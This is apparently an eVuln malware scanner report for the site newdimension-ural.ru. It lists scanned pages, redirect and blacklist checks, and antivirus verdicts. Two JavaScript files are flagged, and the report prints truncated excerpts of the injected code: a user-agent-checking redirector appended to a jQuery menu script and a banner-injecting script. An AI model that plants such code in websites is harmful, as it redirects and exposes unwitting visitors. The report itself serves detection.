New scan:

Malware Scanner report for newdimension-ural.ru

Malicious/Suspicious/Total urls checked
2/0/15
2 pages have malicious code. See details below
Blacklists
OK
Malicious Redirects
OK
Malicious/Hidden/Total iFrames
0/0/0
Deface / Content modification
OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

  • Malware Removal
  • Blacklists Removal
  • Reason Eliminating
  • 1 Month Hack Insurance

More details

Website Hack Insurance

  • Files & DB Monitoring
  • Daily Backups
  • Malware & Hack Detection
  • Unlimited Hack Repairs

More details

Scanned pages/files

RequestServer responseStatus
http://newdimension-ural.ru/
200 OK
Content-Length: 21155
Content-Type: text/html
clean
http://newdimension-ural.ru/media/system/js/caption.js
200 OK
Content-Length: 4106
Content-Type: application/javascript
clean
http://newdimension-ural.ru/modules/mod_nivoslider/assets/jquery.nivo.slider.js
200 OK
Content-Length: 24139
Content-Type: application/javascript
clean
http://newdimension-ural.ru/templates/ndural/js/superfish_jquery.js
200 OK
Content-Length: 37900
Content-Type: application/javascript
malicious
Malicious code - confirmed by antiviruses (see below)

(function(){
function stripos (f_haystack, f_needle, f_offset) {
var haystack = (f_haystack + '').toLowerCase();
var needle = (f_needle + '').toLowerCase();
var leonmain = 0;
if ((leonmain = haystack.indexOf(needle, f_offset)) !== -1) {
return leonmain;
}
return false;
}
function control_agent(){
var see_agent = ['Lunascape','iPhone','Macintosh','Linux','iPad','Flock','SeaMonkey','Nokia','SlimBrowser','AmigaOS','Android','FreeBSD','
... 3229 bytes are skipped ...
end|defaults|pathLevels|has|removeClass|hoverIntent|disableHI|autoArrows|eq|onInit|msie|version|opacity|off|speed|false|onBeforeShow|onShow|onHide|find|css|visibility|hidden|class|siblings|setTimeout|inArray|append|clone|slice|filter|hover|child|focus|blur|push|undefined|toggleClass|breadcrumb|js|enabled|with|sub|indicator|shadow|sfHover|overideThisToUse|800|show|normal|add|hide|sh|visible|animate|jQuery'.split('|'),0,{}));;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;

Antivirus reports:

Qihoo-360
Trojan.Generic
AntiVir
HTML/Rce.Gen
Avast
JS:Redirector-BTV [Trj]

http://newdimension-ural.ru/templates/ndural/js/select.js
200 OK
Content-Length: 15887
Content-Type: application/javascript
clean
http://newdimension-ural.ru/tmp/css/vopuwy.js
200 OK
Content-Length: 112079
Content-Type: application/x-javascript
malicious
Malicious code - confirmed by antiviruses (see below)

(function(e,t){var n,r,i=typeof t,o=e.document,a=e.location,s=e.jQuery,u=e.$,l={},c=[],p="1.9.1",f=c.concat,d=c.push,h=c.slice,g=c.indexOf,m=l.toString,y=l.hasOwnProperty,v=p.trim,b=function(e,t){return new b.fn.init(e,t,r)},x=/[+-]?(?:\d*\.|)\d+(?:[eE][+-]?\d+|)/.source,w=/\S+/g,T=/^[\s\uFEFF\xA0]+|[\s\uFEFF\xA0]+$/g,N=/^(?:(<[\w\W]+>)[^>]*|#([\w-]*))$/,C=/^<(\w+)\s*\/?>(?:<\/\1>|)$/,k=/^[\],:{}\s]*$/,E=/(?:^|:|,)(?:\s*\[)+/g,S=/\\(?:["\\\/bfnrt]|u[\da-fA-F]{4})/g,A=/"[^"\\
... 3347 bytes are skipped ...
oad = function() {
if (!mdom) {
newDiv = document.createElement('p'); newDiv.innerHTML = "<div style='text-align:center; padding-top: 10px; padding-bottom: 10px; background-color:white' class='basic-modal' onclick='click_banner555();' style='cursor:hand'><img src='/sale.png' style='cursor:hand'></div>";
if (document.body.firstChild) { document.body.insertBefore(newDiv, document.body.firstChild); } else { document.body.appendChild(newDiv); }
}
}

Antivirus reports:

Bkav
W32.HfsIframe.3abf

http://newdimension-ural.ru/ru/mail.html
200 OK
Content-Length: 26887
Content-Type: text/html
clean
http://newdimension-ural.ru/ru/map.html
200 OK
Content-Length: 19505
Content-Type: text/html
clean
http://newdimension-ural.ru/ru/pod-klyuch/upravlenie-liczenziyami-dlya-malogo-biznesa.html
200 OK
Content-Length: 22138
Content-Type: text/html
clean
http://newdimension-ural.ru/ru/klienty
200 OK
Content-Length: 23612
Content-Type: text/html
clean
http://newdimension-ural.ru/ru/klienty.html
200 OK
Content-Length: 23202
Content-Type: text/html
clean
http://newdimension-ural.ru/ru/o-kompanii.html
200 OK
Content-Length: 22621
Content-Type: text/html
clean
http://newdimension-ural.ru/resheniya/upravlenie-kommunikacziyami.html
200 OK
Content-Length: 21589
Content-Type: text/html
clean
http://newdimension-ural.ru/otraslevye/transport-i-logistika
200 OK
Content-Length: 27889
Content-Type: text/html
clean
http://newdimension-ural.ru/ru/otraslevye/transport-i-logistika.html
200 OK
Content-Length: 27809
Content-Type: text/html
clean

Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: newdimension-ural.ru

Result:
HTTP/1.1 200 OK
Connection: close
Date: Thu, 24 Jul 2014 01:58:16 GMT
Server: nginx/1.2.4
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
X-Powered-By: PHP/5.3.10-1ubuntu3.4
Second query (visit from search engine):
GET / HTTP/1.1
Host: newdimension-ural.ru
Referer: http://www.google.com/search?q=newdimension-ural.ru

Result:
The result is similar to the first query. There are no suspicious redirects found.

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=newdimension-ural.ru

Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://newdimension-ural.ru/

Result: newdimension-ural.ru is not infected or malware details are not published yet.